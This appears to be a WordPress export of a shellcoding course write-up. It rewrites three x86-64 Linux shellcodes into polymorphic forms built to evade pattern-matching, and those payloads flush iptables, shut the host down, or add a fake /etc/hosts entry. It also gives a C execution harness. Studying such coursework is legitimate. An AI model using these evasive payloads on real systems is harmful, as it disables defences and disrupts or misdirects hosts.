{"id":216,"date":"2018-02-25T11:40:44","date_gmt":"2018-02-25T10:40:44","guid":{"rendered":"http:\/\/pentester.blog\/?p=216"},"modified":"2019-08-18T19:48:38","modified_gmt":"2019-08-18T17:48:38","slug":"slae64-assignment-6-polymorphic-versions-of-shellcodes-from-shell-storm","status":"publish","type":"post","link":"https:\/\/hacktarus.fr\/?p=216","title":{"rendered":"SLAE64 &#8211; Assignment #6 &#8211; Polymorphic versions of shellcodes from Shell-Storm"},"content":{"rendered":"<p>This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification :<\/p>\n<p>http:\/\/www.securitytube-training.com\/online-courses\/x8664-assembly-and-shellcoding-on-linux\/index.html<\/p>\n<p>Student ID: PA-6470<\/p>\n<h2>Assignment #6<\/h2>\n<p>The aim of this assignment is to take 3 shellcodes from shell-storm.org and to create a polymorphic version of them (to beat pattern-matching).<\/p>\n<p>I&rsquo;ve chosen to rewrite the following shellcodes :<\/p>\n<ul>\n<li>http:\/\/shell-storm.org\/shellcode\/files\/shellcode-683.php<\/li>\n<li>http:\/\/shell-storm.org\/shellcode\/files\/shellcode-877.php<\/li>\n<li>http:\/\/shell-storm.org\/shellcode\/files\/shellcode-896.php<\/li>\n<\/ul>\n<h2>shellcode-683<\/h2>\n<h3>Version 1<\/h3>\n<p>I&rsquo;ve changed the original implementation by replacing the \u00ab\u00a0stack\u00a0\u00bb technique by the \u00ab\u00a0jmp call pop\u00a0\u00bb technique.<\/p>\n<p>Original size : 49 bytes<\/p>\n<p>Polymorphic version is smaller :\u00a0 <strong>43 bytes<\/strong><\/p>\n<pre>root@debian64:~\/shellcodes\/x64\/pentesteracademy\/Exam\/Assignment#6# for i in $(objdump -d shellcode-683-polymorphic -M intel |grep \"^ \" |cut -f2); do echo -n '\\x'$i; 
done;echo\r\n\\x48\\x31\\xc0\\x50\\x66\\x68\\x2d\\x46\\x48\\x89\\xe1\\xeb\\x0b\\x5f\\x50\\x51\\x57\\x48\\x89\\xe6\\xb0\\x3b\\x0f\\x05\\xe8\\xf0\\xff\\xff\\xff\\x2f\\x73\\x62\\x69\\x6e\\x2f\\x69\\x70\\x74\\x61\\x62\\x6c\\x65\\x73<\/pre>\n<pre>; Author : SLAE64-PA-6470 (kahlon81)\r\n; Date : 2018\/02\/21\r\n;\r\n; Linux\/x86-64 - execve(\"\/sbin\/iptables\", [\"\/sbin\/iptables\", \"-F\"], NULL) - 43 bytes\r\n;\r\n; nasm -f elf64 shellcode-683-polymorphic.nasm -o shellcode-683-polymorphic.o\r\n; ld shellcode-683-polymorphic.o -o shellcode-683-polymorphic\r\n; \r\n; Original shellcode :\r\n;\r\n; http:\/\/shell-storm.org\/shellcode\/files\/shellcode-683.php\r\n;\r\n; Title: Linux\/x86-64 - execve(\"\/sbin\/iptables\", [\"\/sbin\/iptables\", \"-F\"], NULL) - 49 bytes\r\n; Author: 10n1z3d &lt;10n1z3d[at]w[dot]cn&gt;\r\n; Date: Fri 09 Jul 2010 03:26:12 PM EEST\r\n     \r\nsection .text\r\nglobal _start\r\n         \r\n_start:\r\n    xor     rax, rax\r\n    push    rax\r\n    push    word 0x462d\r\n    mov     rcx, rsp\r\n\r\njmp call_shellcode \r\nshellcode:\r\n    pop rdi\r\n\r\n    push    rax\r\n    push    rcx\r\n    push    rdi\r\n    mov     rsi, rsp\r\n         \r\n    mov     al, 0x3b\r\n    syscall\r\n\r\ncall_shellcode:\r\n   call shellcode\r\n   iptables: db '\/sbin\/iptables'<\/pre>\n<h3>Version 2<\/h3>\n<p>Original size : 49 bytes<\/p>\n<p>Polymorphic version is larger :\u00a0 <strong>61\u00a0bytes but its size is &lt; 150 % of the original size<\/strong><\/p>\n<p>I&rsquo;ve replaced :<\/p>\n<ul>\n<li>xor by mov and sub<\/li>\n<li>push by mov and sub<\/li>\n<\/ul>\n<pre>; Author : SLAE64-PA-6470 (kahlon81)\r\n; Date : 2018\/02\/21\r\n; \r\n; nasm -f elf64 shellcode-683-polymorphic2.nasm -o shellcode-683-polymorphic2.o\r\n; ld shellcode-683-polymorphic2.o -o shellcode-683-polymorphic2\r\n;\r\n; Title: Linux\/x86-64 - execve(\"\/sbin\/iptables\", [\"\/sbin\/iptables\", \"-F\"], NULL) - 49 bytes\r\n     \r\n     \r\n; Source Code (NASM):\r\n     \r\nsection 
.text\r\n\r\nglobal _start\r\n         \r\n_start:\r\n;   xor     rax, rax\r\n<strong>mov rbx, rax\r\nsub rax, rbx<\/strong> \r\n        \r\npush    rax\r\n\r\npush    word 0x462d\r\nmov     rcx, rsp\r\n         \r\nmov     rbx, 0x73656c626174ffff\r\nshr     rbx, 0x10\r\n\r\n;   push    rbx\r\n<strong>mov qword [rsp - 8], rbx\r\nsub rsp, 8<\/strong>\r\n        \r\nmov     rbx, 0x70692f6e6962732f\r\npush    rbx\r\n\r\nmov     rdi, rsp\r\n         \r\npush    rax\r\npush    rcx\r\npush    rdi\r\n\r\nmov     rsi, rsp\r\n         \r\n; execve(\"\/sbin\/iptables\", [\"\/sbin\/iptables\", \"-F\"], NULL);\r\nmov     al, 0x3b\r\nsyscall<\/pre>\n<h2>shellcode-877<\/h2>\n<h3>Version 1<\/h3>\n<p>I&rsquo;ve also changed the original implementation by replacing the \u00ab\u00a0stack\u00a0\u00bb technique by the \u00ab\u00a0jmp call pop\u00a0\u00bb technique.<\/p>\n<p>Original size : 65 bytes<\/p>\n<p>Polymorphic version is smaller : <strong>60 bytes<\/strong><\/p>\n<pre>root@debian64:~\/shellcodes\/x64\/pentesteracademy\/Exam\/Assignment#6# for i in $(objdump -d shellcode-877-polymorphic -M intel |grep \"^ \" |cut -f2); do echo -n '\\x'$i; done;echo\r\n\\x48\\x31\\xc0\\x48\\x31\\xd2\\x50\\x6a\\x77\\x66\\x68\\x6e\\x6f\\x48\\x89\\xe3\\x50\\x66\\x68\\x2d\\x68\\x48\\x89\\xe1\\x50\\xeb\\x0e\\x5f\\x52\\x53\\x51\\x57\\x48\\x89\\xe6\\x48\\x83\\xc0\\x3b\\x0f\\x05\\xe8\\xed\\xff\\xff\\xff\\x2f\\x73\\x62\\x69\\x6e\\x2f\\x73\\x68\\x75\\x74\\x64\\x6f\\x77\\x6e<\/pre>\n<pre>; Author : SLAE64-PA-6470 (kahlon81)\r\n; Date : 2018\/02\/21\r\n;\r\n; Linux\/x86-64 - shutdown -h now x86_64 Shellcode - 60 bytes\r\n;\r\n; nasm -f elf64 shellcode-877-polymorphic.nasm -o shellcode-877-polymorphic.o\r\n; ld shellcode-877-polymorphic.o -o shellcode-877-polymorphic\r\n;\r\n; Original shellcode :\r\n;\r\n; http:\/\/shell-storm.org\/shellcode\/files\/shellcode-877.php\r\n;\r\n; Title: shutdown -h now x86_64 Shellcode - 65 bytes\r\n; Platform: linux\/x86_64\r\n; Date: 2014-06-27\r\n; Author: 
Osanda Malith Jayathissa (@OsandaMalith)\r\n\r\nsection .text\r\n\r\nglobal _start\r\n\r\n_start:\r\n\r\n  xor rax, rax\r\n  xor rdx, rdx \r\n\r\n  push rax\r\n  push byte 0x77\r\n  push word 0x6f6e ; now\r\n  mov rbx, rsp\r\n\r\n  push rax\r\n  push word 0x682d ;-h\r\n  mov rcx, rsp\r\n\r\n  push rax\r\n\r\n  jmp call_shellcode \r\nshellcode:\r\n  pop rdi\r\n\r\n  push rdx\r\n  push rbx\r\n  push rcx\r\n  push rdi\r\n  mov rsi, rsp\r\n\r\n  add rax, 59\r\n  syscall\r\ncall_shellcode:\r\n  call shellcode\r\n  shutdown: db '\/sbin\/shutdown'<\/pre>\n<pre>\/*\r\n*\r\n* Author : SLAE64-PA-6470 (kahlon81)\r\n* Date : 2018\/02\/21\r\n*\r\n* Linux\/x86-64 - shutdown -h now x86_64 Shellcode - 60 bytes\r\n*\r\n* for i in $(objdump -d shellcode-877-polymorphic.o -M intel |grep \"^ \" |cut -f2); do echo -n '\\x'$i; done;echo\r\n*\r\n* gcc -fno-stack-protector -z execstack shellcode-877-polymorphic.c -o shellcode-877-poly\r\n*\r\n*\/\r\n\r\n#include &lt;stdio.h&gt;\r\n#include &lt;string.h&gt;\r\nunsigned char code[] = \"\\x48\\x31\\xc0\\x48\\x31\\xd2\\x50\\x6a\\x77\\x66\\x68\\x6e\\x6f\\x48\\x89\\xe3\\x50\\x66\\x68\\x2d\\x68\\x48\\x89\\xe1\\x50\\xeb\\x0e\\x5f\\x52\\x53\\x51\\x57\\x48\\x89\\xe6\\x48\\x83\\xc0\\x3b\\x0f\\x05\\xe8\\xed\\xff\\xff\\xff\\x2f\\x73\\x62\\x69\\x6e\\x2f\\x73\\x68\\x75\\x74\\x64\\x6f\\x77\\x6e\";\r\n\r\nint main(void)\r\n{\r\n\r\n\tprintf(\"Shellcode Length:  %d\\n\", (int)strlen(code));\r\n\r\n\t\/* cast the byte array to a function pointer and call it; the gcc flags above make its segment executable *\/\r\n\tint (*ret)() = (int(*)())code;\r\n\r\n\tret();\r\n\r\n}<\/pre>\n<h3>Version 2<\/h3>\n<p>Original size : 65 bytes<\/p>\n<p>Polymorphic version is larger :\u00a0 <strong>87 bytes but its size is &lt; 150 % of the original size<\/strong><\/p>\n<p>I&rsquo;ve replaced :<\/p>\n<ul>\n<li>xor by mov and sub<\/li>\n<li>push with mov and sub<\/li>\n<li>add dummy instructions (unused register)<\/li>\n<\/ul>\n<pre>; Author : SLAE64-PA-6470 (kahlon81)\r\n; Date : 2018\/02\/21\r\n\r\n; nasm -f elf64 shellcode-877-polymorphic2.nasm -o shellcode-877-polymorphic2.o\r\n; ld 
shellcode-877-polymorphic2.o -o shellcode-877-polymorphic2\r\n\r\n; Title: shutdown -h now x86_64 Shellcode - 65 bytes\r\n; Platform: linux\/x86_64\r\n; Date: 2014-06-27\r\n; Original Author: Osanda Malith Jayathissa (@OsandaMalith)\r\n\r\nsection .text\r\n\r\nglobal _start\r\n\r\n_start:\r\n\r\n;xor rax, rax\r\n<strong>mov rbx, rax\r\nsub rax, rbx<\/strong>\r\n\r\nxor rdx, rdx \r\n\r\n; dummy instruction\r\n<strong>xor r9, r9\r\nadd r9b, 0x33<\/strong>\r\n\r\n;push rax\r\nmov qword [rsp - 8], rax\r\nsub rsp, 8\r\n\r\npush byte 0x77\r\npush word 0x6f6e ; now\r\nmov rbx, rsp\r\n\r\npush rax\r\npush word 0x682d ;-h\r\nmov rcx, rsp\r\n\r\n; dummy instruction\r\n<strong>sub r9b, 0x12<\/strong>\r\n\r\npush rax\r\nmov r8, 0x2f2f2f6e6962732f ; \/sbin\/shutdown\r\nmov r10, 0x6e776f6474756873\r\npush r10\r\npush r8\r\nmov rdi, rsp\r\n\r\npush rdx\r\npush rbx\r\npush rcx\r\npush rdi\r\nmov rsi, rsp\r\n\r\nadd rax, 59\r\n\r\nsyscall<\/pre>\n<h2>shellcode-896<\/h2>\n<h3>Version 1<\/h3>\n<p>I&rsquo;ve also changed the original implementation by replacing the \u00ab\u00a0stack\u00a0\u00bb technique by the \u00ab\u00a0jmp call pop\u00a0\u00bb technique.<\/p>\n<p>Original size : 110 bytes<\/p>\n<p>Polymorphic version is smaller :\u00a0 <strong>101 bytes<\/strong><\/p>\n<pre>root@debian64:~\/shellcodes\/x64\/pentesteracademy\/Exam\/Assignment#6# for i in $(objdump -d shellcode-896-polymorphic -M intel |grep \"^ \" |cut -f2); do echo -n '\\x'$i; done;echo\r\n\\x48\\x31\\xc0\\x48\\x83\\xc0\\x02\\x48\\x31\\xff\\x48\\x31\\xf6\\x56\\xeb\\x46\\x5f\\x48\\x31\\xf6\\x66\\x81\\xc6\\x01\\x04\\x0f\\x05\\x48\\x97\\x48\\x31\\xc0\\x48\\x83\\xc0\\x01\\xeb\\x18\\x5e\\xb2\\x13\\x0f\\x05\\x48\\x31\\xc0\\x48\\x83\\xc0\\x03\\x0f\\x05\\x48\\x31\\xc0\\xb0\\x3c\\x48\\x31\\xff\\x0f\\x05\\xe8\\xe3\\xff\\xff\\xff\\x31\\x32\\x37\\x2e\\x31\\x2e\\x31\\x2e\\x31\\x20\\x67\\x6f\\x6f\\x67\\x6c\\x65\\x2e\\x6c\\x6b\\xe8\\xb5\\xff\\xff\\xff\\x2f\\x65\\x74\\x63\\x2f\\x68\\x6f\\x73\\x74\\x73<\/pre>\n<pre>; 
Author : SLAE64-PA-6470 (kahlon81)\r\n; Date : 2018\/02\/21\r\n;\r\n; Linux\/x86-64 - Add map in \/etc\/hosts file - 101 bytes\r\n;\r\n; nasm -f elf64 shellcode-896-polymorphic.nasm -o shellcode-896-polymorphic.o\r\n; ld shellcode-896-polymorphic.o -o shellcode-896-polymorphic\r\n;\r\n; Title: Add map in \/etc\/hosts file - 110 bytes\r\n; Date: 2014-10-29\r\n; Platform: linux\/x86_64\r\n; Website: http:\/\/osandamalith.wordpress.com\r\n; Author: Osanda Malith Jayathissa (@OsandaMalith)\r\n\r\nglobal _start\r\n    section .text\r\n\r\n_start:\r\n    ;open\r\n    xor rax, rax \r\n    add rax, 2  ; open syscall\r\n    xor rdi, rdi\r\n    xor rsi, rsi\r\n    push rsi ; 0x00 \r\n    \r\n    jmp call_shellcode \r\nshellcode:\r\n    pop rdi\r\n\r\n    xor rsi, rsi\r\n    add si, 0x401\r\n    syscall\r\n\r\n    ;write\r\n    xchg rax, rdi\r\n    xor rax, rax\r\n    add rax, 1 ; syscall for write\r\n    jmp data\r\n\r\nwrite:\r\n    pop rsi \r\n    mov dl, 19 ; length in rdx\r\n    syscall\r\n\r\n    ;close\r\n    xor rax, rax\r\n    add rax, 3\r\n    syscall\r\n\r\n    ;exit\r\n    xor rax, rax\r\n    mov al, 60\r\n    xor rdi, rdi\r\n    syscall \r\n\r\ndata:\r\n    call write\r\n    text db '127.1.1.1 google.lk'\r\ncall_shellcode:\r\n    call shellcode\r\n    hosts: db '\/etc\/hosts'<\/pre>\n<p>Here is a screenshot of this running shellcode :<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-228\" src=\"http:\/\/hacktarus.fr\/wp-content\/uploads\/2018\/02\/slae64-6-3.png\" alt=\"\" width=\"1332\" height=\"290\" \/><\/p>\n<h3>Version 2<\/h3>\n<p>Original size : 110 bytes<\/p>\n<p>Polymorphic version is larger :\u00a0 <strong>144 bytes but its size is &lt; 150 % of the original size<\/strong><\/p>\n<p>I&rsquo;ve replaced :<\/p>\n<ul>\n<li>mov rcx, 0x1f1f1f1f5364551f with MMX instructions<\/li>\n<li>push r10 with mov and sub<\/li>\n<\/ul>\n<pre>; Author : SLAE64-PA-6470 (kahlon81)\r\n; Date : 2018\/02\/21\r\n; nasm -f elf64 
shellcode-896-polymorphic2.nasm -o shellcode-896-polymorphic2.o\r\n; ld shellcode-896-polymorphic2.o -o shellcode-896-polymorphic2\r\n\r\n; Title: Add map in \/etc\/hosts file - 110 bytes\r\n; Date: 2014-10-29\r\n; Platform: linux\/x86_64\r\n; Website: http:\/\/osandamalith.wordpress.com\r\n; Original author: Osanda Malith Jayathissa (@OsandaMalith)\r\n\r\nglobal _start\r\n    section .text\r\n\r\n_start:\r\n    ;open\r\n    xor rax, rax \r\n    add rax, 2  ; open syscall\r\n    xor rdi, rdi\r\n    xor rsi, rsi\r\n    push rsi ; 0x00\r\n \r\n    ;mov r8, 0x2f2f2f2f6374652f ; stsoh\/\r\n   <strong> mov rcx, 0x1f1f1f1f5364551f  \r\n    movq mm0, rcx               \r\n    mov rcx, 0x1010101010101010 \r\n    movq mm1, rcx\r\n    paddusb mm0, mm1            \r\n    movq r8, mm0\r\n    emms<\/strong>   \r\n\r\n    mov r10, 0x7374736f682f2f2f ; \/cte\/\r\n\r\n    ;push r10\r\n    <strong>mov qword [rsp - 8], r10\r\n    sub rsp, 8<\/strong>\r\n\r\n    push r8\r\n    add rdi, rsp\r\n    xor rsi, rsi\r\n    add si, 0x401\r\n    syscall\r\n\r\n    ;write\r\n    xchg rax, rdi\r\n    xor rax, rax\r\n    add rax, 1 ; syscall for write\r\n    jmp data\r\n\r\nwrite:\r\n    pop rsi \r\n    mov dl, 19 ; length in rdx\r\n    syscall\r\n\r\n    ;close\r\n    xor rax, rax\r\n    add rax, 3\r\n    syscall\r\n\r\n    ;exit\r\n    xor rax, rax\r\n    mov al, 60\r\n    xor rdi, rdi\r\n    syscall \r\n\r\ndata:\r\n    call write\r\n    text db '127.1.1.1 google.lk'<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification : http:\/\/www.securitytube-training.com\/online-courses\/x8664-assembly-and-shellcoding-on-linux\/index.html Student ID: PA-6470 Assignment #6 The aim of this assignment is to take 3 shellcodes from shell-storm.org and to create a polymorphic version of them (to beat pattern-matching). 
I&rsquo;ve chosen to rewrite the following shellcodes : &hellip; <a href=\"https:\/\/hacktarus.fr\/?p=216\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SLAE64 &#8211; Assignment #6 &#8211; Polymorphic versions of shellcodes from Shell-Storm<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-216","post","type-post","status-publish","format-standard","hentry","category-slae64"],"_links":{"self":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/216","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=216"}],"version-history":[{"count":18,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/216\/revisions"}],"predecessor-version":[{"id":301,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/216\/revisions\/301"}],"wp:attachment":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=216"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=216"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=216"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}